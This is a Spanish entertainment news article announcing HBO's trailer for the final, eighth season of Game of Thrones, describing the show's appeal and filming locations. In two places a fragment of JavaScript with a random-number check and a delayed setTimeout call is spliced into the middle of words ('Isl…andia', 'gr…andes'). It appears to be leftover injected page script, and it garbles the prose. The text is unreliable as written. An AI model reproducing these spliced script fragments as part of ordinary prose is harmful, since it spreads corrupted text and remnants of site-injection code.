El avance oficial de la última temporada de Game of Thrones

    El avance oficial de la última temporada de Game of Thrones

    La octava y última temporada de GOT llegará en abril de 2019.

    Autor: Redacción Maxim 13 noviembre, 2018


     

    Fotografías cortesía HBO

    El trailer de la octava temporada Game of Thrones promete un final de alarido

     

    HBO dio a conocer el trailer de la octava y última temporada de Game of Thrones que llegará en abril de 2019. La serie más ganadora en la historia de los premios Emmy, promete un final de alarido para culminar con su brillante paso por la televisión en la era del streaming.

     

     

     

    La serie que lo tiene todo

    Basada en la saga de novelas Canción de hielo y fuego de George R.R. Martin, GOT  ha dejado huella entre los televidentes. Una asombrosa producción de carácter medieval que nos muestra un mundo ficticio en el que siete reinos pugnan por apoderarse del trono de hierro.

     

    via GIPHY

     

     

    Una de las principales claves de su éxito, es que esta producción  logró conjugar distintos géneros como la fantasía, el terror, la intriga política y el drama. Esta versatilidad hace de Game of Thrones una serie que tiene algo que ofrecer a todo tipo de público. Un titánico trabajo de producción con locaciones espectaculares en Islandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andia, Malta, Reino Unido, Marruecos, Croacia y España.

     

     

     

     

     

     

     

    El sexo, la violencia, los dragones, el drama, el estupendo guión, la intriga y la fantasía hacen de GOT una de las grandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andes series de nuestra época. Y que seguramente, no nos decepcionará en su temporada final.

     

     

     

     

     

     

     

     

    ¡Ya queremos verla!

     

     

     

     

     

    Temas relacionados con esta nota: , , , , ,

La octava y última temporada de GOT llegará en abril de 2019.